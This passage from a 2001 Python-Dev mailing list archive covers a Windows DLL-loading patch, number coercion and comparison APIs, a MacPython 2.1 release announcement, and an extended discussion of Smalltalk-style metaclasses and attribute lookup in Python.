If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas at xs4all.net Tue May 1 10:07:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 1 12:30:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... 
> > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can sometimes not work correctly unless the absolute > + path is used. 
If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 1 23:22:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a probelm with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API PyNumber_Compare() knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Tue May 1 23:23:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications. 
MacPython offers a lot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, unix-compatible cgi-scripting, image-manipulation libraries, numerical libraries, Tk-based machine-independent windowing and lots more. Uniquely among Pythons, it also allows you to create fully self-contained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBedit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig at python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido at digicool.com Wed May 2 02:52:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalk's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh.
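For comparison, here is how the same MyDictType example behaves in a present-day Python 3 interpreter, not the 2.2 descr-branch under discussion. `dict` plays the role of DictType and `type` that of TypeType. Both define `__repr__`, and the method stored in the type's own `__dict__` wins, so the override can call the base repr directly. As far as I understand CPython's `type.__getattribute__`, the modern rule is roughly this: a data descriptor found on the metatype wins first (which is why `dict.__class__` is still `type`), then the type's own MRO dictionaries, then any remaining attributes of the metatype.

```python
class MyDictType(dict):
    def __repr__(self):
        # dict.__repr__ resolves to dict.__dict__['__repr__'], the repr for
        # dictionary *instances*, not type.__repr__ (the repr of the class).
        return "MyDictType(%s)" % dict.__repr__(self)

d = MyDictType(a=1)
print(repr(d))                                     # MyDictType({'a': 1})

# Both the type and its metatype define __repr__ ...
print('__repr__' in dict.__dict__, '__repr__' in type.__dict__)  # True True
# ... and plain attribute access on the class picks the type's own entry.
print(dict.__repr__ is dict.__dict__['__repr__'])  # True
# The metatype's version is still reachable explicitly.
print(type.__repr__(dict))                         # <class 'dict'>
# __class__ is a data descriptor inherited by the metatype, so it wins.
print(dict.__class__ is type)                      # True
```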
--Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same as Python does. To illustrate, suppose you have object.method() (using Python-style syntax). The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object" one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object.__class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object).
Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__, namely object.__class__.__class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it is exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: if I have a class Date in Smalltalk and an instance of it referenced by variable d, I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method. I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class.__class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on an object.
All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). 
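The lookup Jim describes, and the Smalltalk-76 limitation it leads to, can be modelled in a few lines. This is a toy sketch, not real Smalltalk: `STObject`, `STClass`, `send` and `DoesNotUnderstand` are hypothetical names. One `send` function serves both instance and class messages. It starts at the receiver's class and follows single-inheritance `superclass` links. Because every class is an instance of the single `Class`, a "class method" added there is visible to every class.

```python
class DoesNotUnderstand(Exception):
    """Raised when no class on the superclass chain defines the selector."""

class STObject:
    """Toy Smalltalk object: all it knows is which class it is an instance of."""
    def __init__(self, st_class):
        self.st_class = st_class

class STClass(STObject):
    """Toy class object: itself an object, plus a methodDict and one superclass."""
    def __init__(self, st_class, name, superclass=None, methods=None):
        super().__init__(st_class)
        self.name = name
        self.superclass = superclass
        self.method_dict = dict(methods or {})

def send(receiver, selector, *args, **kwargs):
    """Smalltalk-style lookup: start at the receiver's class, follow superclass links."""
    cls = receiver.st_class
    while cls is not None:
        method = cls.method_dict.get(selector)
        if method is not None:
            return method(receiver, *args, **kwargs)
        cls = cls.superclass
    raise DoesNotUnderstand(selector)

def _new(cls, **fields):
    """'new' lives in Class, so it is found when the receiver is a class object."""
    obj = STObject(cls)
    vars(obj).update(fields)
    return obj

# Smalltalk-76 arrangement: a single Class, which is an instance of itself.
Class = STClass(None, "Class", methods={"new": _new})
Class.st_class = Class
Object = STClass(Class, "Object",
                 methods={"describe": lambda self: "a " + self.st_class.name})
Class.superclass = Object
Rectangle = STClass(Class, "Rectangle", superclass=Object,
                    methods={"area": lambda self: self.width * self.height})

r = send(Rectangle, "new", width=2, height=3)  # class message: found in Class
print(send(r, "area"))         # 6 (found in Rectangle.method_dict)
print(send(r, "describe"))     # a Rectangle (found via Rectangle.superclass)

# The limitation: a "class method" added to Class is shared by every class.
Class.method_dict["currentDate"] = lambda cls: "today"
print(send(Rectangle, "currentDate"))  # today (meaningless for Rectangle)

try:
    send(r, "new")             # instances never see methods defined in Class
except DoesNotUnderstand as exc:
    print("doesNotUnderstand:", exc)   # doesNotUnderstand: new
```

Smalltalk-80's fix, as described next, amounts to giving each class its own subclass of Class (its metaclass), so that `currentDate` could live in a DateMetaClass instead of in Class itself.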
In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actual hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class and one such that when it is instantiated, the instance is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hierarchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass.
All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). 
Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido at digicool.com Wed May 2 03:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? 
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Wed May 2 02:42:15 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido at digicool.com Wed May 2 03:55:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. 
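One way to give the "more meaningful exception" asked about above is to validate `__all__` up front. This is a minimal sketch, assuming Python 3. The helper `check_all` is hypothetical and not part of any library, and the second check (that every listed name is actually defined) goes slightly beyond the original question. As far as I know, recent Python 3 versions already reject non-string entries with a TypeError during `from m import *`.

```python
import types

def check_all(module):
    """Hypothetical helper: validate module.__all__ with descriptive errors."""
    names = getattr(module, "__all__", None)
    if names is None:
        return                               # no __all__: nothing to check
    for i, name in enumerate(names):
        if not isinstance(name, str):
            raise TypeError("%s.__all__[%d] must be a string, not %s: %r"
                            % (module.__name__, i, type(name).__name__, name))
        if not hasattr(module, name):
            raise AttributeError("%s.__all__ lists %r, which the module does not define"
                                 % (module.__name__, name))

demo = types.ModuleType("demo")
demo.HTTP = object()
demo.__all__ = ["HTTP", 42]                 # the second entry is the mistake
try:
    check_all(demo)
except TypeError as exc:
    print(exc)   # demo.__all__[1] must be a string, not int: 42
```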
--Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 03:22:47 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Wed May 2 04:48:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) 
> > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 04:48:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. 
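Greg's transitional idea, a `__dict__` that behaves like the union of an instance's own namespace and the `__classdict__` chain, can be modelled with `collections.ChainMap`. This is only a minimal sketch. `Klass`, `Instance`, `classdict` and `lookup` are hypothetical stand-ins, not real Python internals, and base classes are walked depth-first, left to right.

```python
from collections import ChainMap


class Klass:
    """Hypothetical class object that keeps methods and defaults in a
    separate `classdict`, as in Greg's __classdict__ proposal."""

    def __init__(self, name, bases=(), classdict=None):
        self.name = name
        self.bases = tuple(bases)
        self.classdict = dict(classdict or {})

    def lookup_chain(self):
        # This class first, then each base in turn (depth-first, left to right).
        maps = [self.classdict]
        for base in self.bases:
            maps.extend(base.lookup_chain())
        return maps


class Instance:
    """Hypothetical instance: x.foo looks in the instance namespace first,
    then in the classdicts up the inheritance chain."""

    def __init__(self, klass):
        self.klass = klass
        self.dict = {}  # the instance's own namespace

    def combined_dict(self):
        # Transitional pseudo-dict: the union of the old __dict__ and __classdict__.
        return ChainMap(self.dict, *self.klass.lookup_chain())

    def lookup(self, name):
        try:
            return self.combined_dict()[name]
        except KeyError:
            raise AttributeError(name) from None


Base = Klass("Base", classdict={"color": "red", "size": 1})
Derived = Klass("Derived", (Base,), {"size": 2})
x = Instance(Derived)
x.dict["color"] = "blue"

print(x.lookup("color"))  # blue: the instance namespace wins
print(x.lookup("size"))   # 2: Derived's classdict is searched before Base's
```

Because `ChainMap` writes only to its first mapping, an assignment through the combined view lands in the instance namespace and never in a class's `classdict`, which is how ordinary instance assignment already behaves.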
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Wed May 2 09:59:03 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > problem with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > that knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as a separate API was simply to shift code out of PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons.
So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). 
